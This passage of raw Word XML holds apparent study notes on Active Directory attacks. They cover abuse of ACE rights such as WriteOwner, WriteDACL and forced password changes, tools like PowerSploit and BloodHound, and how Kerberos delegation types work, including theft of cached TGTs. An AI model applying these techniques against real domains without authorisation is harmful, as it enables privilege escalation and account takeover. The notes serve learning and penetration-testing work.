        </w:rPr>
        <w:t>non-protected parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> of our target object. This could allow us to, for example, update the scriptPath parameter, which would cause a script to execute the next time the user logs on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365D1733" w14:textId="77777777" w:rsidR="004E0874" w:rsidRPr="004E0874" w:rsidRDefault="004E0874" w:rsidP="004E0874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>WriteOwner:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t> We have the ability to update the owner of the target object. We could make ourselves the owner, allowing us to gain additional permissions over the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4FC07E" w14:textId="77777777" w:rsidR="004E0874" w:rsidRPr="004E0874" w:rsidRDefault="004E0874" w:rsidP="004E0874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>WriteDACL:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t> We have the ability to write new ACEs to the target object's DACL. We could, for example, write an ACE that grants our account full control over the target object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9867C3" w14:textId="77777777" w:rsidR="004E0874" w:rsidRPr="004E0874" w:rsidRDefault="004E0874" w:rsidP="004E0874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>AllExtendedRights:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> We have the ability to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>any action associated with extended AD rights</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> against the target object. This includes, for example, the ability to force change a user's password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387A19A5" w14:textId="63FCC2D4" w:rsidR="004126A1" w:rsidRDefault="00760E84" w:rsidP="00573669">
      <w:r w:rsidRPr="00831FDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00831FDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00831FDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ACEs, we will need a method to interact with AD to make these requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00760E84">
        <w:t>. The two best options for this are the </w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00831FDE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>AD-RSAT</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00573669">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00573669" w:rsidRPr="00573669">
        <w:t>Remote Server Administration Tools</w:t>
      </w:r>
      <w:r w:rsidR="00573669">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00760E84">
        <w:t> PowerShell cmdlets or </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00831FDE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>PowerSploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00831FDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5250B9" w14:textId="49771D1A" w:rsidR="004126A1" w:rsidRDefault="0053601B" w:rsidP="004126A1">
      <w:r>
        <w:t>Use Bloodhound to Escalate privileges and attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FC8B05" w14:textId="77777777" w:rsidR="004126A1" w:rsidRDefault="004126A1" w:rsidP="004126A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5243F2CB" w14:textId="77777777" w:rsidR="003F60C2" w:rsidRDefault="003F60C2" w:rsidP="004126A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F0EA16" w14:textId="77777777" w:rsidR="003F60C2" w:rsidRDefault="003F60C2" w:rsidP="004126A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68726A94" w14:textId="77777777" w:rsidR="003F60C2" w:rsidRDefault="003F60C2" w:rsidP="004126A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F0B8E6" w14:textId="77777777" w:rsidR="006C22B9" w:rsidRDefault="006C22B9" w:rsidP="004126A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7909D268" w14:textId="77777777" w:rsidR="003F60C2" w:rsidRDefault="003F60C2" w:rsidP="004126A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52FC0552" w14:textId="77777777" w:rsidR="006C22B9" w:rsidRDefault="006C22B9" w:rsidP="006C22B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00991170">
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting Kerberos Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56104CA3" w14:textId="0CDD47B0" w:rsidR="006C22B9" w:rsidRDefault="004E2361" w:rsidP="004E2361">
      <w:r w:rsidRPr="004E2361">
        <w:t xml:space="preserve">Allow a service (like a web app) to impersonate a user and access another service (like a SQL DB) on the user’s behalf — </w:t>
      </w:r>
      <w:r w:rsidRPr="004E2361">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>without the user needing direct database credentials</w:t>
      </w:r>
      <w:r w:rsidR="003F60C2" w:rsidRPr="003F60C2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A14FC" w14:textId="04B23B9B" w:rsidR="00D003E2" w:rsidRPr="00D003E2" w:rsidRDefault="00D003E2" w:rsidP="00D003E2">
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without Delegation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:t xml:space="preserve">: All users share a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>single service account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> “Delegated Account”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:t xml:space="preserve"> to access the </w:t>
      </w:r>
      <w:r>
        <w:t>resource (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:t>. This account has fixed permissions</w:t>
      </w:r>
      <w:r>
        <w:t>, used by all users</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the database can't tell which user made the request</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D83B087" w14:textId="416EA203" w:rsidR="00D003E2" w:rsidRPr="00D003E2" w:rsidRDefault="00D003E2" w:rsidP="00D003E2">
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With Delegation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:t xml:space="preserve">: The web app can access the database </w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on behalf of the actual user</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:t xml:space="preserve">, meaning the database sees the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user’s identity</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:t>, not just the service account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC8D93" w14:textId="714C5A16" w:rsidR="00D003E2" w:rsidRPr="00D003E2" w:rsidRDefault="00D003E2" w:rsidP="004E2361">
      <w:pPr>
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>More Explain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663EF238" w14:textId="01A68BD5" w:rsidR="003F60C2" w:rsidRPr="00D003E2" w:rsidRDefault="003F60C2" w:rsidP="003F60C2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Without Delegation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D003E2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>if a user</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> use</w:t>
      </w:r>
      <w:r w:rsidR="00D003E2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> web app on web server, when </w:t>
      </w:r>
      <w:r w:rsidR="00D003E2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>a user</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00192DDB" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>needs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access </w:t>
      </w:r>
      <w:r w:rsidR="004E2361" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>DB</w:t>
      </w:r>
      <w:r w:rsidR="00D003E2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> on another server</w:t>
      </w:r>
      <w:r w:rsidR="004E2361" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> he uses a service account for DB Access and </w:t>
      </w:r>
      <w:r w:rsidR="00D003E2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">uses it to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Access DB </w:t>
      </w:r>
      <w:r w:rsidR="00192DDB" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>esources</w:t>
      </w:r>
      <w:r w:rsidR="00D003E2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. Any </w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">user will use the same service account and access DB with the </w:t>
      </w:r>
      <w:r w:rsidR="00D003E2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Service account</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">DB Server just sees and accepts the Service </w:t>
      </w:r>
      <w:r w:rsidR="00D003E2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>account not consider which actual user</w:t>
      </w:r>
      <w:r w:rsidR="00D003E2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, and this account has privileges used by all users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6A5115" w14:textId="28B84009" w:rsidR="004126A1" w:rsidRPr="00D003E2" w:rsidRDefault="00D003E2" w:rsidP="00D003E2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:r w:rsidR="003F60C2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Kerberos Delegation</w:t>
      </w:r>
      <w:r w:rsidR="00192DDB" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F60C2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r w:rsidR="003F60C2" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> request resources or perform actions on behalf of a user, while maintaining the security principles of authentication and authorization, </w:t>
      </w:r>
      <w:r w:rsidR="00192DDB" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Service account is delegated by user to request specific resources from DB</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, Service Acc not have full permission or the same for all users</w:t>
      </w:r>
      <w:r w:rsidR="00192DDB" w:rsidRPr="00D003E2">
        <w:rPr>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C2A5C9" w14:textId="4850F91E" w:rsidR="00D003E2" w:rsidRDefault="00D003E2" w:rsidP="00D003E2">
      <w:r w:rsidRPr="00D003E2">
        <w:t xml:space="preserve">Kerberos Delegation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s the service account that is allowed to act on behalf of the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284EA546" w14:textId="77777777" w:rsidR="00D003E2" w:rsidRPr="00D003E2" w:rsidRDefault="00D003E2" w:rsidP="00D003E2">
      <w:r w:rsidRPr="00D003E2">
        <w:t xml:space="preserve">service uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberos ticket</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:t xml:space="preserve"> that represents the user, so the DB sees and authorizes based on </w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>that user’s identity</w:t>
      </w:r>
      <w:r w:rsidRPr="00D003E2">
        <w:t xml:space="preserve">, not the service </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D003E2">
        <w:t>account's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D003E2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F0D98" w14:textId="77777777" w:rsidR="004126A1" w:rsidRDefault="004126A1" w:rsidP="004126A1"/>
    <w:p w14:paraId="75C9C98D" w14:textId="13BFBAA9" w:rsidR="004D50DA" w:rsidRPr="004D50DA" w:rsidRDefault="004D50DA" w:rsidP="004126A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delegation Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D4183" w14:textId="1153A4C0" w:rsidR="004126A1" w:rsidRDefault="004D50DA" w:rsidP="00425E97">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unconstrained</w:t>
      </w:r>
      <w:r>
        <w:t>: Delegated Service Account can be Delegated for all services</w:t>
      </w:r>
      <w:r w:rsidR="00425E97">
        <w:t xml:space="preserve">, the Delegated Service Account </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00425E97">
        <w:t>have</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00425E97">
        <w:t xml:space="preserve"> user TGT and save it, if this pivot account or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00425E97">
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00425E97">
        <w:t xml:space="preserve"> server is compromised all users TGTs can be used by attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4080EB60" w14:textId="3336EE20" w:rsidR="004D50DA" w:rsidRDefault="004D50DA" w:rsidP="004D50DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D50DA">
        <w:t xml:space="preserve">Enabled by setting the </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TRUSTED_FOR_DELEGATION</w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217717C0" w14:textId="4D7BB716" w:rsidR="004D50DA" w:rsidRDefault="004D50DA" w:rsidP="004D50DA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Constrained</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:t xml:space="preserve"> service account can only impersonate users </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>to specific services</w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:t xml:space="preserve"> (like MSSQL, CIFS, or HTTP)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C8C4D4" w14:textId="01F7946B" w:rsidR="004D50DA" w:rsidRPr="004D50DA" w:rsidRDefault="004D50DA" w:rsidP="004D50DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D50DA">
        <w:t xml:space="preserve">Set in Active Directory on the </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>delegating account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B53379A" w14:textId="6624D74F" w:rsidR="004D50DA" w:rsidRPr="004D50DA" w:rsidRDefault="004D50DA" w:rsidP="004D50DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D50DA">
        <w:t xml:space="preserve">Use the msDS-AllowedToDelegateTo attribute to list </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022F5C9D" w14:textId="45164E98" w:rsidR="004D50DA" w:rsidRDefault="004D50DA" w:rsidP="004D50DA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource-Based Constrained Delegation (RBCD)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:t xml:space="preserve">Instead of configuring the delegating account (like the web app), the </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target service</w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:t xml:space="preserve"> (like the database server) </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>controls</w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:t xml:space="preserve"> who can delegate to it.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:t xml:space="preserve">It sets a list of trusted accounts that are allowed to impersonate users </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>to it</w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
